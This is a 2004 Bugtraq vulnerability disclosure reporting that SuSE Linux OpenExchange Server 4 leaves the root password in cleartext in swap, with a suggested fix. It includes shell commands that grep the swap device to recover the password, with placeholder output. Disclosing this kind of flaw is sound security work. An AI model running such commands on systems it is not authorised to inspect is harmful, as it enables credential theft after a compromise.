Date: 31 Aug 2004 08:11:53 -0000
From: Rene <l0om@...luded.org>
To: bugtraq@...urityfocus.com
Subject: Linux OpenExchange - cleartext rootpw in swap

date: 31.08.2004
author: l0om   -  l0om [at] excluded dot org - www.excluded.org
discovered in: SuSE Linux Openexchange Server 4
problem: cleartext rootpw in swap caused by fergotten "mlock" or wiping out memory

hi,

i have noticed my root password flying around on my swap in cleartext.
an attacker who has successfully rooted a box can get the cleartext password from the swap device.

i dont know if this is caused by some SuSE mistake at the web login- maybe its a fault in openldap.
i dont know exactly where this is caused.

root:~ # strings swap -5 | grep GroupwareDBport -A 2|  grep -A 2 loginDestination
loginDestination
MYROOTCLEARTEXT_PASSWORD
loginDestination
MYROOTCLEARTEXT_PASSWORD
loginDestination
MYROOTCLEARTEXT_PASSWORD
[...]

i also had success in getting my cleartext password with

root:~ # strings swap -5 | grep /etc/postfix/main.cf -A 2
/etc/postfix/main.cf
MYROOTCLEARTEXT_PASSWORD
erfolgreich
--
/etc/postfix/main.cf
MYROOTCLEARTEXT_PASSWORD

however- such things can be prevented with wiping out the memory where the
password was stored or with using mlock.

greets @ murfie, johnny, klouw, (other google masters ;])
         maximilian, and the guys from excluded.org